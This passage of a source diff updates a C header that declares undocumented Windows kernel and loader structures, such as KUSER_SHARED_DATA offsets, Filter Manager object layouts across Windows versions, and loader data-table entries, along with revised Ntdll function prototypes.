@@ -5657,7 +6321,7 @@ typedef struct _PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10;
-typedef struct _PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 {
+typedef struct tagPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 {
union {
DWORD Flags;
struct {
@@ -5675,6 +6339,17 @@ typedef struct _PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 {
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10, * PPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10;
+typedef struct tagPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 {
+ union {
+ DWORD Flags;
+ struct {
+ DWORD EnforceRedirectionTrust : 1;
+ DWORD AuditRedirectionTrust : 1;
+ DWORD ReservedFlags : 30;
+ } DUMMYSTRUCTNAME;
+ } DUMMYUNIONNAME;
+} PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10, * PPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10;
+
typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {
PROCESS_MITIGATION_POLICY Policy;
union
@@ -5693,6 +6368,7 @@ typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {
PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 ChildProcessPolicy;
PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 SideChannelIsolationPolicy;
PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 UserShadowStackPolicy;
+ PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 RedirectionTrustPolicy;
};
} PROCESS_MITIGATION_POLICY_INFORMATION, *PPROCESS_MITIGATION_POLICY_INFORMATION;
@@ -5842,15 +6518,16 @@ typedef struct _KUSER_SHARED_DATA {
union {
volatile KSYSTEM_TIME TickCount;
volatile ULONG64 TickCountQuad;
- ULONG ReservedTickCountOverlay[3];
+ struct {
+ ULONG ReservedTickCountOverlay[3];
+ ULONG TickCountPad[1];
+ };
};
- ULONG TickCountPad[1];
-
ULONG Cookie;
- ULONG CookiedPad;
+ ULONG CookiedPad[1];
- ULONG ConsoleSessionForegroundProcessId;
+ LONGLONG ConsoleSessionForegroundProcessId;
ULONGLONG TimeUpdateLock;
ULONGLONG BaselineSystemTimeQpc;
@@ -5893,29 +6570,152 @@ typedef struct _KUSER_SHARED_DATA {
XSTATE_CONFIGURATION XState;
+ KSYSTEM_TIME FeatureConfigurationChangeStamp;
+ ULONG Spare;
+
} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;
#include
#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA)
+#if !defined(__midl) && !defined(MIDL_PASS)
+
+//
+// The overall size can change, but it must be the same for all architectures.
+//
+
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountLowDeprecated) == 0x0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountMultiplier) == 0x4);
+C_ASSERT(__alignof(KSYSTEM_TIME) == 4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTime) == 0x08);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemTime) == 0x014);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBias) == 0x020);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberLow) == 0x02c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberHigh) == 0x02e);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtSystemRoot) == 0x030);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MaxStackTraceDepth) == 0x238);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, CryptoExponent) == 0x23c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneId) == 0x240);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LargePageMinimum) == 0x244);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AitSamplingValue) == 0x248);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AppCompatFlag) == 0x24c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, RNGSeedVersion) == 0x250);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, GlobalValidationRunlevel) == 0x258);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasStamp) == 0x25c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtBuildNumber) == 0x260);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtProductType) == 0x264);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProductTypeIsValid) == 0x268);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NativeProcessorArchitecture) == 0x26a);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMajorVersion) == 0x26c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMinorVersion) == 0x270);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProcessorFeatures) == 0x274);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved1) == 0x2b4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved3) == 0x2b8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeSlip) == 0x2bc);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AlternativeArchitecture) == 0x2c0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemExpirationDate) == 0x2c8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SuiteMask) == 0x2d0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, KdDebuggerEnabled) == 0x2d4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MitigationPolicies) == 0x2d5);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveConsoleId) == 0x2d8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, DismountCount) == 0x2dc);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ComPlusPackage) == 0x2e0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LastSystemRITEventTickCount) == 0x2e4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NumberOfPhysicalPages) == 0x2e8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SafeBootMode) == 0x2ec);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, VirtualizationFlags) == 0x2ed);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved12) == 0x2ee);
+
+#if defined(_MSC_EXTENSIONS)
+
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SharedDataFlags) == 0x2f0);
+
+#endif
+
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TestRetInstruction) == 0x2f8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcFrequency) == 0x300);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCall) == 0x308);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad0) == 0x30c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad) == 0x310);
+
+#if defined(_MSC_EXTENSIONS)
+
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCount) == 0x320);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountQuad) == 0x320);
+
+#endif
+
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Cookie) == 0x330);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ConsoleSessionForegroundProcessId) == 0x338);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeUpdateLock) == 0x340);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineSystemTimeQpc) == 0x348);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineInterruptTimeQpc) == 0x350);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrement) == 0x358);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrement) == 0x360);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrementShift) == 0x368);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrementShift) == 0x369);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UnparkedProcessorCount) == 0x36a);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, EnclaveFeatureMask) == 0x36c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved8) == 0x37c);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UserModeGlobalLogger) == 0x380);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageFileExecutionOptions) == 0x3a0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LangGenerationCount) == 0x3a4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved4) == 0x3a8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTimeBias) == 0x3b0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcBias) == 0x3b8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveProcessorCount) == 0x3c0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveGroupCount) == 0x3c4);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved9) == 0x3c5);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcData) == 0x3c6);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveStart) == 0x3c8);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveEnd) == 0x3d0);
+C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, XState) == 0x3d8);
+
+#endif /* __midl | MIDL_PASS */
+
/*
** KUSER_SHARED_DATA END
*/
/*
-** FLT MANAGER START
+** MM UNLOADED DRIVERS START
*/
-#define FLTFL_MANDATORY_UNLOAD_IN_PROGRESS 0x1
-#define FLTFL_FILTERING_INITIATED 0x2
-#define FLTFL_NAME_PROVIDER 0x4
-#define FLTFL_SUPPORTS_PIPES_MAILSLOTS 0x8
+typedef struct _UNLOADED_DRIVERS {
+ UNICODE_STRING Name;
+ PVOID StartAddress;
+ PVOID EndAddress;
+ LARGE_INTEGER CurrentTime;
+} UNLOADED_DRIVERS, *PUNLOADED_DRIVERS;
-#define FLT_OBFL_DRAINING 0x1
-#define FLT_OBFL_ZOMBIED 0x2
-#define FLT_OBFL_TYPE_INSTANCE 0x1000000
-#define FLT_OBFL_TYPE_FILTER 0x2000000
-#define FLT_OBFL_TYPE_VOLUME 0x4000000
+#define MI_UNLOADED_DRIVERS 50
+
+/*
+** MM UNLOADED DRIVERS END
+*/
+
+
+/*
+** FLT MANAGER START
+*/
+typedef enum _FLT_FILTER_FLAGS {
+ FLTFL_MANDATORY_UNLOAD_IN_PROGRESS = 1,
+ FLTFL_FILTERING_INITIATED = 2,
+ FLTFL_NAME_PROVIDER = 4,
+ FLTFL_SUPPORTS_PIPES_MAILSLOTS = 8,
+ FLTFL_BACKED_BY_PAGEFILE = 16,
+ FLTFL_SUPPORTS_DAX_VOLUME = 32,
+ FLTFL_SUPPORTS_WCOS = 64,
+ FLTFL_FILTERS_READ_WRITE = 128,
+} FLT_FILTER_FLAGS, *PFLT_FILTER_FLAGS;
+
+typedef enum _FLT_OBJECT_FLAGS {
+ FLT_OBFL_DRAINING = 1,
+ FLT_OBFL_ZOMBIED = 2,
+ FLT_OBFL_TYPE_INSTANCE = 0x1000000,
+ FLT_OBFL_TYPE_FILTER = 0x2000000,
+ FLT_OBFL_TYPE_VOLUME = 0x4000000,
+} FLT_OBJECT_FLAGS, *PFLT_OBJECT_FLAGS;
typedef struct _FLT_OBJECT {
ULONG Flags;
@@ -5924,6 +6724,15 @@ typedef struct _FLT_OBJECT {
LIST_ENTRY PrimaryLink;
} FLT_OBJECT, *PFLT_OBJECT;
+// Since w10 th1
+typedef struct _FLT_OBJECT_V2 {
+ ULONG Flags;
+ ULONG PointerCount;
+ EX_RUNDOWN_REF RundownRef;
+ LIST_ENTRY PrimaryLink;
+ GUID UniqueIdentifier;
+} FLT_OBJECT_V2, *PFLT_OBJECT_V2; /* size: 0x0030 */
+
typedef struct _FLT_SERVER_PORT_OBJECT {
LIST_ENTRY FilterLink;
PVOID ConnectNotify;
@@ -5932,9 +6741,171 @@ typedef struct _FLT_SERVER_PORT_OBJECT {
PVOID Filter;
PVOID Cookie;
ULONG Flags;
- ULONG NumberOfConnections;
- ULONG MaxConnections;
-} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT;
+ LONG NumberOfConnections;
+ LONG MaxConnections;
+ LONG __PADDING__[1];
+} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT; /* size: 0x0048 */
+
+typedef struct _FLT_RESOURCE_LIST_HEAD {
+ ERESOURCE rLock;
+ LIST_ENTRY rList;
+ ULONG rCount;
+ LONG __PADDING__[1];
+} FLT_RESOURCE_LIST_HEAD, *PFLT_RESOURCE_LIST_HEAD; /* size: 0x0080 */
+
+typedef struct _FLT_MUTEX_LIST_HEAD {
+ FAST_MUTEX mLock;
+ LIST_ENTRY mList;
+ union {
+ ULONG mCount;
+ struct {
+ UCHAR mInvalid : 1;
+ CHAR __PADDING__[7];
+ };
+ };
+} FLT_MUTEX_LIST_HEAD, *PFLT_MUTEX_LIST_HEAD; /* size: 0x0050 */
+
+// Windows 7 version
+typedef struct _FLT_FILTER_V1 {
+ /* 0x0000 */ FLT_OBJECT Base;
+ /* 0x0020 */ struct _FLTP_FRAME* Frame;
+ /* 0x0028 */ UNICODE_STRING Name;
+ /* 0x0038 */ UNICODE_STRING DefaultAltitude;
+ /* 0x0048 */ FLT_FILTER_FLAGS Flags;
+ /* 0x004c */ LONG Padding;
+ /* 0x0050 */ DRIVER_OBJECT* DriverObject;
+ /* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;
+ /* 0x00d8 */ struct FLT_VERIFIER_EXTENSION* VerifierExtension;
+ /* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;
+ /* 0x00f0 */ PVOID FilterUnload /* function */;
+ /* 0x00f8 */ PVOID InstanceSetup /* function */;
+ /* 0x0100 */ PVOID InstanceQueryTeardown /* function */;
+ /* 0x0108 */ PVOID InstanceTeardownStart /* function */;
+ /* 0x0110 */ PVOID InstanceTeardownComplete /* function */;
+ /* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
+ /* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[6];
+ /* 0x0150 */ PVOID PreVolumeMount /* function */;
+ /* 0x0158 */ PVOID PostVolumeMount /* function */;
+ /* 0x0160 */ PVOID GenerateFileName /* function */;
+ /* 0x0168 */ PVOID NormalizeNameComponent /* function */;
+ /* 0x0170 */ PVOID NormalizeNameComponentEx /* function */;
+ /* 0x0178 */ PVOID NormalizeContextCleanup /* function */;
+ /* 0x0180 */ PVOID KtmNotification /* function */;
+ /* 0x0188 */ struct _FLT_OPERATION_REGISTRATION* Operations;
+ /* 0x0190 */ PVOID OldDriverUnload /* function */;
+ /* 0x0198 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
+ /* 0x01e8 */ FLT_MUTEX_LIST_HEAD ConnectionList;
+ /* 0x0238 */ FLT_MUTEX_LIST_HEAD PortList;
+ /* 0x0288 */ EX_PUSH_LOCK PortLock;
+} FLT_FILTER_V1, * PFLT_FILTER_V1; /* size: 0x0290 */
+
+// Windows 8/8.1 version
+typedef struct _FLT_FILTER_V2 {
+ /* 0x0000 */ FLT_OBJECT Base;
+ /* 0x0020 */ struct _FLTP_FRAME* Frame;
+ /* 0x0028 */ UNICODE_STRING Name;
+ /* 0x0038 */ UNICODE_STRING DefaultAltitude;
+ /* 0x0048 */ FLT_FILTER_FLAGS Flags;
+ /* 0x004c */ LONG Padding;
+ /* 0x0050 */ DRIVER_OBJECT* DriverObject;
+ /* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;
+ /* 0x00d8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
+ /* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;
+ /* 0x00f0 */ PVOID FilterUnload /* function */;
+ /* 0x00f8 */ PVOID InstanceSetup /* function */;
+ /* 0x0100 */ PVOID InstanceQueryTeardown /* function */;
+ /* 0x0108 */ PVOID InstanceTeardownStart /* function */;
+ /* 0x0110 */ PVOID InstanceTeardownComplete /* function */;
+ /* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
+ /* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
+ /* 0x0158 */ PVOID PreVolumeMount /* function */;
+ /* 0x0160 */ PVOID PostVolumeMount /* function */;
+ /* 0x0168 */ PVOID GenerateFileName /* function */;
+ /* 0x0170 */ PVOID NormalizeNameComponent /* function */;
+ /* 0x0178 */ PVOID NormalizeNameComponentEx /* function */;
+ /* 0x0180 */ PVOID NormalizeContextCleanup /* function */;
+ /* 0x0188 */ PVOID KtmNotification /* function */;
+ /* 0x0190 */ PVOID SectionNotification /* function */; //SINCE 8.1
+ /* 0x0198 */ struct _FLT_OPERATION_REGISTRATION* Operations;
+ /* 0x01a0 */ PVOID OldDriverUnload /* function */;
+ /* 0x01a8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
+ /* 0x01f8 */ FLT_MUTEX_LIST_HEAD ConnectionList;
+ /* 0x0248 */ FLT_MUTEX_LIST_HEAD PortList;
+ /* 0x0298 */ EX_PUSH_LOCK PortLock;
+} FLT_FILTER_V2, * PFLT_FILTER_V2; /* size: 0x02a0 */
+
+// Windows 10 version
+typedef struct _FLT_FILTER_V3 {
+ /* 0x0000 */ FLT_OBJECT_V2 Base;
+ /* 0x0030 */ struct _FLTP_FRAME* Frame;
+ /* 0x0038 */ UNICODE_STRING Name;
+ /* 0x0048 */ UNICODE_STRING DefaultAltitude;
+ /* 0x0058 */ FLT_FILTER_FLAGS Flags;
+ /* 0x005c */ LONG Padding;
+ /* 0x0060 */ DRIVER_OBJECT* DriverObject;
+ /* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;
+ /* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
+ /* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;
+ /* 0x0100 */ PVOID FilterUnload /* function */;
+ /* 0x0108 */ PVOID InstanceSetup /* function */;
+ /* 0x0110 */ PVOID InstanceQueryTeardown /* function */;
+ /* 0x0118 */ PVOID InstanceTeardownStart /* function */;
+ /* 0x0120 */ PVOID InstanceTeardownComplete /* function */;
+ /* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
+ /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
+ /* 0x0168 */ PVOID PreVolumeMount /* function */;
+ /* 0x0170 */ PVOID PostVolumeMount /* function */;
+ /* 0x0178 */ PVOID GenerateFileName /* function */;
+ /* 0x0180 */ PVOID NormalizeNameComponent /* function */;
+ /* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;
+ /* 0x0190 */ PVOID NormalizeContextCleanup /* function */;
+ /* 0x0198 */ PVOID KtmNotification /* function */;
+ /* 0x01a0 */ PVOID SectionNotification /* function */;
+ /* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;
+ /* 0x01b0 */ PVOID OldDriverUnload /* function */;
+ /* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
+ /* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;
+ /* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;
+ /* 0x02a8 */ EX_PUSH_LOCK PortLock;
+} FLT_FILTER_V3, *PFLT_FILTER_V3; /* size: 0x02b0 */
+
+// Windows 10/11+ (22000)
+typedef struct _FLT_FILTER_V4 {
+ /* 0x0000 */ FLT_OBJECT_V2 Base;
+ /* 0x0030 */ struct _FLTP_FRAME* Frame;
+ /* 0x0038 */ UNICODE_STRING Name;
+ /* 0x0048 */ UNICODE_STRING DefaultAltitude;
+ /* 0x0058 */ FLT_FILTER_FLAGS Flags;
+ /* 0x005c */ LONG Padding;
+ /* 0x0060 */ DRIVER_OBJECT* DriverObject;
+ /* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;
+ /* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
+ /* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;
+ /* 0x0100 */ PVOID FilterUnload /* function */;
+ /* 0x0108 */ PVOID InstanceSetup /* function */;
+ /* 0x0110 */ PVOID InstanceQueryTeardown /* function */;
+ /* 0x0118 */ PVOID InstanceTeardownStart /* function */;
+ /* 0x0120 */ PVOID InstanceTeardownComplete /* function */;
+ /* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
+ /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
+ /* 0x0168 */ PVOID PreVolumeMount /* function */;
+ /* 0x0170 */ PVOID PostVolumeMount /* function */;
+ /* 0x0178 */ PVOID GenerateFileName /* function */;
+ /* 0x0180 */ PVOID NormalizeNameComponent /* function */;
+ /* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;
+ /* 0x0190 */ PVOID NormalizeContextCleanup /* function */;
+ /* 0x0198 */ PVOID KtmNotification /* function */;
+ /* 0x01a0 */ PVOID SectionNotification /* function */;
+ /* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;
+ /* 0x01b0 */ PVOID OldDriverUnload /* function */;
+ /* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
+ /* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;
+ /* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;
+ /* 0x02a8 */ EX_PUSH_LOCK_AUTO_EXPAND PortLock;
+} FLT_FILTER_V4, * PFLT_FILTER_V4; /* size: 0x02b8 */
+
+typedef FLT_FILTER_V4 FLT_FILTER_COMPATIBLE;
+typedef PFLT_FILTER_V4 PFLT_FILTER_COMPATIBLE;
/*
** FLT MANAGER END
@@ -5957,6 +6928,7 @@ typedef struct _SILO_USER_SHARED_DATA {
ULONG SuiteMask;
ULONG SharedUserSessionId;
BOOLEAN IsMultiSessionSku;
+ BOOLEAN IsStateSeparationEnabled;
WCHAR NtSystemRoot[260];
USHORT UserModeGlobalLogger[16];
} SILO_USER_SHARED_DATA, *PSILO_USER_SHARED_DATA;
@@ -5973,6 +6945,13 @@ typedef struct _OBP_SILODRIVERSTATE {
OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;
} OBP_SILODRIVERSTATE, *POBP_SILODRIVERSTATE;
+typedef struct _OBP_SILODRIVERSTATE_V2 {
+ EX_FAST_REF SystemDeviceMap;
+ OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;
+ EX_PUSH_LOCK DeviceMapLock;
+ OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;
+} OBP_SILODRIVERSTATE_V2, * POBP_SILODRIVERSTATE_V2; /* size: 0x02e0 */
+
//incomplete, values not important, change between versions.
typedef struct _ESERVERSILO_GLOBALS {
OBP_SILODRIVERSTATE ObSiloState;
@@ -6316,7 +7295,7 @@ PushEntryList(
#define LDR_DLL_NOTIFICATION_REASON_UNLOADED 2
typedef enum _LDR_DLL_LOAD_REASON {
- LoadReasonStaticDependency,
+ LoadReasonStaticDependency = 0,
LoadReasonStaticForwarderDependency,
LoadReasonDynamicForwarderDependency,
LoadReasonDelayloadDependency,
@@ -6325,6 +7304,7 @@ typedef enum _LDR_DLL_LOAD_REASON {
LoadReasonAsDataLoad,
LoadReasonEnclavePrimary,
LoadReasonEnclaveDependency,
+ LoadReasonPatchImage,
LoadReasonUnknown = -1
} LDR_DLL_LOAD_REASON, * PLDR_DLL_LOAD_REASON;
@@ -6429,36 +7409,17 @@ typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {
PVOID SectionPointer;
ULONG CheckSum;
};
- } DUMMYUNION1;
- union
- {
- ULONG TimeDateStamp;
- PVOID LoadedImports;
- } DUMMYUNION2;
- //fields below removed for compatibility, if you need them use LDR_DATA_TABLE_ENTRY_FULL
-} LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
-typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;
-typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE* PLDR_DATA_TABLE_ENTRY;
-typedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY;
-
-typedef struct _RTL_BALANCED_NODE
-{
- union
- {
- struct _RTL_BALANCED_NODE* Children[2];
- struct
- {
- struct _RTL_BALANCED_NODE* Left;
- struct _RTL_BALANCED_NODE* Right;
- };
- };
+ } DUMMYUNION1;
union
{
- UCHAR Red : 1;
- UCHAR Balance : 2;
- ULONG_PTR ParentValue;
- };
-} RTL_BALANCED_NODE, * PRTL_BALANCED_NODE;
+ ULONG TimeDateStamp;
+ PVOID LoadedImports;
+ } DUMMYUNION2;
+ //fields below removed for compatibility, if you need them use LDR_DATA_TABLE_ENTRY_FULL
+} LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
+typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;
+typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE* PLDR_DATA_TABLE_ENTRY;
+typedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY;
typedef BOOLEAN(NTAPI* PLDR_INIT_ROUTINE)(
_In_ PVOID DllHandle,
@@ -6514,6 +7475,16 @@ typedef struct _LDR_DDAG_NODE
ULONG PreorderNumber;
} LDR_DDAG_NODE, * PLDR_DDAG_NODE;
+typedef enum _LDR_HOT_PATCH_STATE
+{
+ LdrHotPatchBaseImage = 0,
+ LdrHotPatchNotApplied = 1,
+ LdrHotPatchAppliedReverse = 2,
+ LdrHotPatchAppliedForward = 3,
+ LdrHotPatchFailedToPatch = 4,
+ LdrHotPatchStateMax = 5,
+} LDR_HOT_PATCH_STATE, * PLDR_HOT_PATCH_STATE;
+
//
// Full declaration of LDR_DATA_TABLE_ENTRY
//
@@ -6588,6 +7559,12 @@ typedef struct _LDR_DATA_TABLE_ENTRY_FULL
ULONG ReferenceCount;
ULONG DependentLoadFlags;
UCHAR SigningLevel;
+ CHAR Padding1[3];
+ ULONG CheckSum;
+ LONG Padding2;
+ PVOID ActivePatchImageBase;
+ LDR_HOT_PATCH_STATE HotPatchState;
+ LONG __PADDING__[1];
} LDR_DATA_TABLE_ENTRY_FULL, * PLDR_DATA_TABLE_ENTRY_FULL;
typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
@@ -6919,7 +7896,7 @@ NTSTATUS
NTAPI
LdrRelocateImage(
_In_ PVOID NewBase,
- _In_ PSTR LoaderName,
+ _In_opt_ PSTR LoaderName,
_In_ NTSTATUS Success,
_In_ NTSTATUS Conflict,
_In_ NTSTATUS Invalid);
@@ -6933,14 +7910,16 @@ LdrProcessRelocationBlock(
_In_ PUSHORT NextOffset,
_In_ LONG_PTR Diff);
+DECLSPEC_NORETURN
NTSYSAPI
-NTSTATUS
+VOID
NTAPI
LdrShutdownProcess(
VOID);
+DECLSPEC_NORETURN
NTSYSAPI
-NTSTATUS
+VOID
NTAPI
LdrShutdownThread(
VOID);
@@ -7070,7 +8049,7 @@ NTSTATUS
NTAPI
RtlInitUnicodeStringEx(
_Out_ PUNICODE_STRING DestinationString,
- _In_opt_ PWSTR SourceString);
+ _In_opt_ PCWSTR SourceString);
NTSYSAPI
BOOLEAN
@@ -7275,7 +8254,7 @@ RtlGetFullPathName_U(
_Out_opt_ PWSTR *lpFilePart);
NTSYSAPI
-BOOLEAN
+NTSTATUS
NTAPI
RtlGetSearchPath(
_Out_ PWSTR *SearchPath);
@@ -7396,14 +8375,14 @@ VOID
NTAPI
RtlRunEncodeUnicodeString(
_Inout_ PUCHAR Seed,
- _In_ PUNICODE_STRING String);
+ _Inout_ PUNICODE_STRING String);
NTSYSAPI
VOID
NTAPI
RtlRunDecodeUnicodeString(
_In_ UCHAR Seed,
- _In_ PUNICODE_STRING String);
+ _Inout_ PUNICODE_STRING String);
/************************************************************************************
*
@@ -8863,6 +9842,26 @@ NTAPI
RtlGetSystemTimePrecise(
VOID);
+NTSYSAPI
